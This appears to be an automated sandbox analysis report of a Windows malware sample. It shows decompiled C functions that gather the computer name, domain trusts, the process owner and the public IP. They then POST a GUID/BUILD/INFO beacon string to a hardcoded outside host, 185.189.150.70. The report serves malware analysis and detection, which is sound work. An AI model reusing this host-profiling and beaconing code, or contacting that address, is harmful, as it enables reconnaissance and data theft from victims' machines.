                                                                                                                                                    0x00611b44
                                                                                                                                                    0x00611b44
                                                                                                                                                    0x00611b8d
                                                                                                                                                    0x00611b94
                                                                                                                                                    0x00611b99
                                                                                                                                                    0x00611b9c
                                                                                                                                                    0x00611ba9
                                                                                                                                                    0x00611bae
                                                                                                                                                    0x00611bae
                                                                                                                                                    0x00611bb2
                                                                                                                                                    0x00611bb9
                                                                                                                                                    0x00611bcb
                                                                                                                                                    0x00611bd0
                                                                                                                                                    0x00611bd6
                                                                                                                                                    0x00611bd8
                                                                                                                                                    0x00611bdf
                                                                                                                                                    0x00611be4
                                                                                                                                                    0x00611be7
                                                                                                                                                    0x00611be7
                                                                                                                                                    0x00611bfd
                                                                                                                                                    0x00611c04
                                                                                                                                                    0x00611c09
                                                                                                                                                    0x00611c0c
                                                                                                                                                    0x00611c13
                                                                                                                                                    0x00611c19
                                                                                                                                                    0x00611c1e
                                                                                                                                                    0x00611c21
                                                                                                                                                    0x00611c21
                                                                                                                                                    0x00611c28
                                                                                                                                                    0x00611c39
                                                                                                                                                    0x00611c3f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611c2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611c2a
                                                                                                                                                    0x00611c28
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(?,006118CD,?,00100000,?), ref: 00611A8D
                                                                                                                                                      • Part of subcall function 006130D0: GetComputerNameA.KERNEL32 ref: 006130FA
                                                                                                                                                      • Part of subcall function 006130D0: lstrcatA.KERNEL32(00100000,?), ref: 0061310F
                                                                                                                                                      • Part of subcall function 006130D0: lstrcatA.KERNEL32(00100000, @ ), ref: 0061311E
                                                                                                                                                      • Part of subcall function 006130D0: lstrcatA.KERNEL32(00100000,?), ref: 00613142
                                                                                                                                                      • Part of subcall function 00612500: lstrcpyA.KERNEL32(00611AB9,185.189.150.70,?,?,00611AB9,?,?), ref: 00612520
                                                                                                                                                      • Part of subcall function 006123A0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00611AC8,?,?,00611AC8,?,?,?), ref: 006123C1
                                                                                                                                                      • Part of subcall function 006133E0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00611B01), ref: 006133FB
                                                                                                                                                    • wsprintfA.USER32 ref: 00611B3E
                                                                                                                                                    • wsprintfA.USER32 ref: 00611B7D
                                                                                                                                                    Strings
                                                                                                                                                    • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 00611B32
                                                                                                                                                    • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 00611B71
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                                                                                                                                                    • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                                                                                                                                                    • API String ID: 768865819-2171647522
                                                                                                                                                    • Opcode ID: 1b53fd73a4ec29c1b5c3f34365ba0ac9fb2fc4a65b290ca7062b44ce94cd5e47
                                                                                                                                                    • Instruction ID: 461b6262019a33f152484f8d5ce8ab16be62a6dc7250317d6188e17163320d1b
                                                                                                                                                    • Opcode Fuzzy Hash: 1b53fd73a4ec29c1b5c3f34365ba0ac9fb2fc4a65b290ca7062b44ce94cd5e47
                                                                                                                                                    • Instruction Fuzzy Hash: 0251A5B2D04219DBDB14DF94DC91EFE77BABB58300F0C816DF20A9B251E6349A85CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00611390, Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00611390(long _a4) {
				void* _t4;
				void* _t6;

				if( *0x61715c == 0) {
					 *0x61715c = GetProcessHeap();
				}
				if( *0x61715c == 0) {
					return 0;
				} else {
					_t6 =  *0x61715c; // 0x1380000
					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
					return _t4;
				}
			}





                                                                                                                                                    0x0061139a
                                                                                                                                                    0x006113a2
                                                                                                                                                    0x006113a2
                                                                                                                                                    0x006113ae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006113b0
                                                                                                                                                    0x006113b6
                                                                                                                                                    0x006113bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006113bd

                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                    • RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                    • Opcode ID: 90fbf9c4e4d38b44e90aa2d60c7d0541129e6eb2d7c74de47bcb80692e2de2cc
                                                                                                                                                    • Instruction ID: 4d74110a65be11daa19efee29675d9dbe0a9f88d8d9202892e0e768ffb0e5128
                                                                                                                                                    • Opcode Fuzzy Hash: 90fbf9c4e4d38b44e90aa2d60c7d0541129e6eb2d7c74de47bcb80692e2de2cc
                                                                                                                                                    • Instruction Fuzzy Hash: 4EE0B630108645EBD7089FA1FC0D7E537BAA307301F0CE516A6058A6A0CA759880CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0062BAF2, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00011AFE,0062ACA3), ref: 0062BAF7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 70d1420a2b6f767c50d9759a8b683d35e8631ed5e16ee4bee663ee49372e433b
                                                                                                                                                    • Instruction ID: 0d325843eb56ffcb731cdb7b49b090a1093fb479fc76dfb729b7604cb4c2325e
                                                                                                                                                    • Opcode Fuzzy Hash: 70d1420a2b6f767c50d9759a8b683d35e8631ed5e16ee4bee663ee49372e433b
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006128B0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 188stringnetworkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E006128B0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
				void* _v8;
				void* _v12;
				signed short _v16;
				signed int _v20;
				void _v24;
				void _v28;
				void* _v32;
				int _v36;
				long _v40;
				int _v44;
				int _v48;
				long _v52;
				intOrPtr _v64;
				char* _v68;
				signed short _v88;
				intOrPtr _v92;
				char* _v96;
				long _v100;
				void* _v112;
				char _v372;
				char _v632;
				int _t90;
				int _t100;
				void* _t145;

				E006114A0( &_v112, 0, 0x3c);
				_v112 = 0x3c;
				_v96 =  &_v372;
				_v92 = 0x104;
				_v68 =  &_v632;
				_v64 = 0x104;
				_v36 = 0;
				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
				if(_a8 != 0) {
					_v36 = lstrlenA(_a8);
				}
				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
					if(_v100 == 0) {
						_v100 = 3;
					}
					if(_v100 == 3 || _v100 == 4) {
						_v32 = E006124D0();
						if(_v32 != 0) {
							_v16 = _v88;
							_v20 = 0x84080100;
							if(_v100 == 4) {
								_v20 = _v20 | 0x00803000;
							}
							_v12 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0);
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x617048, _v20, 0);
								if(_v8 != 0) {
									if(_v100 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
										_v24 = _v24 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
									}
									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
									_v48 = _t90;
									_v28 = 0;
									if(_v48 == 1) {
										_v52 = 4;
										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
										if(_v28 == 0xc8 && _a12 != 0) {
											_t100 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
											if(_t100 == 0 ||  *_a20 <= 0) {
												 *_a20 = 0;
											} else {
												 *((char*)(_a12 +  *_a20)) = 0;
											}
										}
									}
									InternetCloseHandle(_v8); // executed
									InternetCloseHandle(_v12);
									if(_v28 != 0xc8) {
										return 0;
									} else {
										return 1;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}



























                                                                                                                                                    0x006128c1
                                                                                                                                                    0x006128c9
                                                                                                                                                    0x006128d6
                                                                                                                                                    0x006128d9
                                                                                                                                                    0x006128e6
                                                                                                                                                    0x006128e9
                                                                                                                                                    0x006128f0
                                                                                                                                                    0x00612902
                                                                                                                                                    0x0061290d
                                                                                                                                                    0x0061291d
                                                                                                                                                    0x00612929
                                                                                                                                                    0x00612935
                                                                                                                                                    0x00612935
                                                                                                                                                    0x0061294c
                                                                                                                                                    0x00612959
                                                                                                                                                    0x0061295b
                                                                                                                                                    0x0061295b
                                                                                                                                                    0x00612966
                                                                                                                                                    0x0061297a
                                                                                                                                                    0x00612981
                                                                                                                                                    0x0061298e
                                                                                                                                                    0x00612992
                                                                                                                                                    0x0061299d
                                                                                                                                                    0x006129a8
                                                                                                                                                    0x006129a8
                                                                                                                                                    0x006129cb
                                                                                                                                                    0x006129d2
                                                                                                                                                    0x00612a00
                                                                                                                                                    0x00612a07
                                                                                                                                                    0x00612a1e
                                                                                                                                                    0x00612a20
                                                                                                                                                    0x00612a35
                                                                                                                                                    0x00612a44
                                                                                                                                                    0x00612a53
                                                                                                                                                    0x00612a53
                                                                                                                                                    0x00612a6e
                                                                                                                                                    0x00612a74
                                                                                                                                                    0x00612a77
                                                                                                                                                    0x00612a82
                                                                                                                                                    0x00612a84
                                                                                                                                                    0x00612a9e
                                                                                                                                                    0x00612aab
                                                                                                                                                    0x00612ac6
                                                                                                                                                    0x00612ace
                                                                                                                                                    0x00612ae9
                                                                                                                                                    0x00612ad8
                                                                                                                                                    0x00612ae0
                                                                                                                                                    0x00612ae0
                                                                                                                                                    0x00612ace
                                                                                                                                                    0x00612aab
                                                                                                                                                    0x00612af3
                                                                                                                                                    0x00612afd
                                                                                                                                                    0x00612b0a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612b0c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612b0c
                                                                                                                                                    0x00612b0a
                                                                                                                                                    0x00612a0d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006129d4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006129d4
                                                                                                                                                    0x006129d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061296e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061296e
                                                                                                                                                    0x00612966
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 006128FC
                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0061292F
                                                                                                                                                      • Part of subcall function 006124D0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 006124E9
                                                                                                                                                    • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00612944
                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 006129C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$lstrlen$ConnectCrackOpen
                                                                                                                                                    • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                    • API String ID: 4167639401-2842678110
                                                                                                                                                    • Opcode ID: fb1fdccd18486ed226863064cfbf76313a2010a39868e904e36803eaba31f412
                                                                                                                                                    • Instruction ID: cb8f8d85d95178864d907d6a15017bb4287ad667fc08137cc106685f4345a5d2
                                                                                                                                                    • Opcode Fuzzy Hash: fb1fdccd18486ed226863064cfbf76313a2010a39868e904e36803eaba31f412
                                                                                                                                                    • Instruction Fuzzy Hash: 46717F71A0420AEFDF10CFA5DC59BEEB7B6FB48705F148529E605AB280D7749A84CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612FE0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612FE0(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				union _TOKEN_INFORMATION_CLASS _v28;
				union _SID_NAME_USE _v32;
				int _t31;
				int _t37;
				int _t43;

				_v12 = OpenProcess(0x400, 0, _a4);
				if(_v12 != 0) {
					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
						_v8 = 0;
						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
						if(_t31 != 0 || GetLastError() != 0x7a) {
							return 0;
						} else {
							_v24 = E00611390(_v8);
							_v20 = _v24;
							_v28 = 0;
							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
							if(_t37 != 0) {
								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
								if(_t43 != 0) {
									_v28 = 1;
								}
							}
							E006113D0(_v24);
							return _v28;
						}
					}
					return 0;
				}
				return 0;
			}













                                                                                                                                                    0x00612ff7
                                                                                                                                                    0x00612ffe
                                                                                                                                                    0x0061301c
                                                                                                                                                    0x00613025
                                                                                                                                                    0x0061303a
                                                                                                                                                    0x00613042
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613053
                                                                                                                                                    0x0061305f
                                                                                                                                                    0x00613065
                                                                                                                                                    0x00613068
                                                                                                                                                    0x00613081
                                                                                                                                                    0x00613089
                                                                                                                                                    0x006130a7
                                                                                                                                                    0x006130af
                                                                                                                                                    0x006130b1
                                                                                                                                                    0x006130b1
                                                                                                                                                    0x006130af
                                                                                                                                                    0x006130bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006130c4
                                                                                                                                                    0x00613042
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061301e
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00612E25,?,?,00000104,?,00000104), ref: 00612FF1
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,00612E25,?,?,00000104), ref: 00613014
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: OpenProcess$Token
                                                                                                                                                    • String ID: %.a
                                                                                                                                                    • API String ID: 2935449343-4034201083
                                                                                                                                                    • Opcode ID: 3e8860c1ea01317c07ba9b1d5f94b01de447a61380a2e079a42776e1bb3d4461
                                                                                                                                                    • Instruction ID: bbd6688c178436ac21ea0342a5d8ee6ad7bd202498100b067915efad4c90b4b8
                                                                                                                                                    • Opcode Fuzzy Hash: 3e8860c1ea01317c07ba9b1d5f94b01de447a61380a2e079a42776e1bb3d4461
                                                                                                                                                    • Instruction Fuzzy Hash: 6D3101B5A00209AFDB00DFA5DC85FEE77BAAB4C705F148558F606E7280DB71AB44CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0066A820, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 309memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(00000007,0000300B,006A9A58,006B12B4,006B12B0,006A9A28,?), ref: 0066ACAB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID: $$$$$$$$C
                                                                                                                                                    • API String ID: 544645111-3650051871
                                                                                                                                                    • Opcode ID: 85d35a718f0852dbf5e17c526674b9b43a0aa1b1810d6021e7df9e85c21c2de5
                                                                                                                                                    • Instruction ID: f12942a11c102aa42824af0fd03222416770e5bee756a0f0ba77f6d73c0c9e66
                                                                                                                                                    • Opcode Fuzzy Hash: 85d35a718f0852dbf5e17c526674b9b43a0aa1b1810d6021e7df9e85c21c2de5
                                                                                                                                                    • Instruction Fuzzy Hash: 65E17B78905104EFC708EFADD9D09AABBF3FB46304F28925EC5055B36AD234AA41DF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006123A0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E006123A0(CHAR* _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char* _t30;

				 *_a4 = 0;
				_t30 =  &_v16;
				__imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
				if(_t30 == 0) {
					if(_v16 != 0) {
						_v8 = 0;
						while(_v8 < _v16) {
							if( *(_v12 + _v8 * 0x2c) != 0) {
								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
								lstrcatA(_a4, ";");
							}
							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
								lstrcatA(_a4,  *(_v12 + _t26));
								lstrcatA(_a4, ";");
							}
							_v8 = _v8 + 1;
						}
						return 1;
					}
					return 1;
				}
				return 0;
			}







                                                                                                                                                    0x006123b1
                                                                                                                                                    0x006123b5
                                                                                                                                                    0x006123c1
                                                                                                                                                    0x006123c9
                                                                                                                                                    0x006123d6
                                                                                                                                                    0x006123e2
                                                                                                                                                    0x006123f4
                                                                                                                                                    0x00612407
                                                                                                                                                    0x00612418
                                                                                                                                                    0x00612427
                                                                                                                                                    0x00612427
                                                                                                                                                    0x00612439
                                                                                                                                                    0x00612442
                                                                                                                                                    0x0061244b
                                                                                                                                                    0x0061245a
                                                                                                                                                    0x0061245a
                                                                                                                                                    0x006123f1
                                                                                                                                                    0x006123f1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612462
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006123d8
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00611AC8,?,?,00611AC8,?,?,?), ref: 006123C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DomainEnumerateTrusts
                                                                                                                                                    • String ID: p
                                                                                                                                                    • API String ID: 4051863571-2821316953
                                                                                                                                                    • Opcode ID: e4f68060491eb5223338abc62bf54bfb3c9ac516fde68a8114f1094a4eb8bf1e
                                                                                                                                                    • Instruction ID: 7360993f87ccc442008e9f15d6c43f4d22ca7ce0b1689ac640eaf989567514b5
                                                                                                                                                    • Opcode Fuzzy Hash: e4f68060491eb5223338abc62bf54bfb3c9ac516fde68a8114f1094a4eb8bf1e
                                                                                                                                                    • Instruction Fuzzy Hash: A0214F31A00209FBCB08CFA4D995FEDBBB6FB48301F1491A9E5059B290D774AED1DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00668E70, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1458COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(000007E9,006B0470), ref: 006698A5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PathTemp
                                                                                                                                                    • String ID: j$;$U$n
                                                                                                                                                    • API String ID: 2920410445-27418773
                                                                                                                                                    • Opcode ID: 0b5eeb45c3c136bd7719c3ccc35ae02809194643d164b930f7155fe8cd6a8ca4
                                                                                                                                                    • Instruction ID: b3b5ee127e6d8f2b02c5f0980eb7527b444b0d9a4f4f39dc22904b8f682b06b3
                                                                                                                                                    • Opcode Fuzzy Hash: 0b5eeb45c3c136bd7719c3ccc35ae02809194643d164b930f7155fe8cd6a8ca4
                                                                                                                                                    • Instruction Fuzzy Hash: 1CC26A756093918FC304DF29D8901AABBE6BBAA314F18592FF495C7351E338E845CF62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0062ACB0, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___security_init_cookie.LIBCMT ref: 0062ACB0
                                                                                                                                                      • Part of subcall function 0062B89A: ___get_entropy.LIBCMT ref: 0062B8B4
                                                                                                                                                      • Part of subcall function 0062B055: ___isa_available_init.LIBCMT ref: 0062B065
                                                                                                                                                    • ___scrt_release_startup_lock.LIBCMT ref: 0062AD4C
                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0062AD60
                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0062AD86
                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 0062ADC9
                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 0062AE22
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___scrt_is_nonwritable_in_current_image$___get_entropy___isa_available_init___scrt_fastfail___scrt_release_startup_lock___scrt_uninitialize_crt___security_init_cookie
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1682875030-0
                                                                                                                                                    • Opcode ID: 8cb549842deec6978cad8d426e1e5d4a5f185610647a1b8b935396daa2da70ae
                                                                                                                                                    • Instruction ID: b04049c0503d4214a29e4ab88b2f8e3b2f692ff5f19ef159c3a703ff78901522
                                                                                                                                                    • Opcode Fuzzy Hash: 8cb549842deec6978cad8d426e1e5d4a5f185610647a1b8b935396daa2da70ae
                                                                                                                                                    • Instruction Fuzzy Hash: 06312431544E229BCBA47BF0B812BAD27639F42721F24151EF0806B6D3CFA148419E5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612500, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 42stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612500(void* __ecx, CHAR* _a4) {
				char _v8;
				void* _t10;

				if( *0x00617278 == 0) {
					_t10 = E00611FC0("http://api.ipify.org", "185.189.150.70", 0x20,  &_v8); // executed
					if(_t10 != 1) {
						 *((char*)(0x617278)) = 0;
						lstrcpyA(_a4, "0.0.0.0");
						return 0;
					}
					 *((char*)(_v8 + 0x617278)) = 0;
					lstrcpyA(_a4, "185.189.150.70");
					return 1;
				}
				lstrcpyA(_a4, "185.189.150.70");
				return 1;
			}





                                                                                                                                                    0x00612515
                                                                                                                                                    0x0061253d
                                                                                                                                                    0x00612548
                                                                                                                                                    0x00612572
                                                                                                                                                    0x00612582
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612588
                                                                                                                                                    0x0061254d
                                                                                                                                                    0x0061255d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612563
                                                                                                                                                    0x00612520
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • lstrcpyA.KERNEL32(00611AB9,185.189.150.70,?,?,00611AB9,?,?), ref: 00612520
                                                                                                                                                    • lstrcpyA.KERNEL32(00611AB9,185.189.150.70,?,?,00611AB9,?,?), ref: 0061255D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                    • String ID: 0.0.0.0$185.189.150.70$http://api.ipify.org
                                                                                                                                                    • API String ID: 3722407311-3193360669
                                                                                                                                                    • Opcode ID: eabff7db5d6762ab58153f4344ddc57e452939d90d394f60d27cdd2021995f64
                                                                                                                                                    • Instruction ID: c3c4c78d52894864d3defbcc675b3ba39cc5929174e6ad1cda1ca485a838319d
                                                                                                                                                    • Opcode Fuzzy Hash: eabff7db5d6762ab58153f4344ddc57e452939d90d394f60d27cdd2021995f64
                                                                                                                                                    • Instruction Fuzzy Hash: C4012634748201A7EB048B78CDAABE93BABD729300F1C4254FA059F381C9F5DAC68740
